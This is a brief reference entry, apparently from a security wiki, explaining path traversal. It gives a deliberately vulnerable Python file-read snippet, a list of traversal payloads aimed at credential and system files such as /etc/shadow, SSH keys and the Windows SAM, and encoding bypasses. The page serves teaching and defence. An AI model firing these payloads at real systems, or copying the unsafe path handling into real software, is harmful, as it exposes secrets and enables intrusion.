Path Traversal

Path Traversal (also called Directory Traversal or Dot-Dot-Slash attack) is a vulnerability that allows attackers to access files and directories outside the intended directory by manipulating file path references using sequences like ../.

How It Works

Applications often use user input to construct file paths. If input is not properly validated, attackers can use relative path sequences to escape the intended directory and access arbitrary files on the filesystem.

Vulnerable Code Example

# Python - vulnerable
filename = request.args.get('file')
content = open('/var/www/files/' + filename).read()

# Request: /download?file=../../../etc/passwd
# Results in reading: /var/www/files/../../../etc/passwd = /etc/passwd

Common Payloads

# Unix/Linux
../../../etc/passwd
....//....//....//etc/passwd
..%2F..%2F..%2Fetc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd

# Windows
..\..\..\windows\system32\config\sam
..%5c..%5c..%5cwindows\win.ini
....\\....\\....\\windows\system32\drivers\etc\hosts

Common Targets

• Unix: /etc/passwd, /etc/shadow, ~/.ssh/id_rsa
• Windows: C:\Windows\win.ini, boot.ini, SAM database
• Application: Config files, source code, credentials

Bypass Techniques

• URL encoding: %2e%2e%2f
• Double encoding: %252e%252e%252f
• Unicode encoding: ..%c0%af
• Null byte (older systems): ../../../etc/passwd%00.png

See Also

• Directory Traversal
• Local File Inclusion
• Arbitrary File Read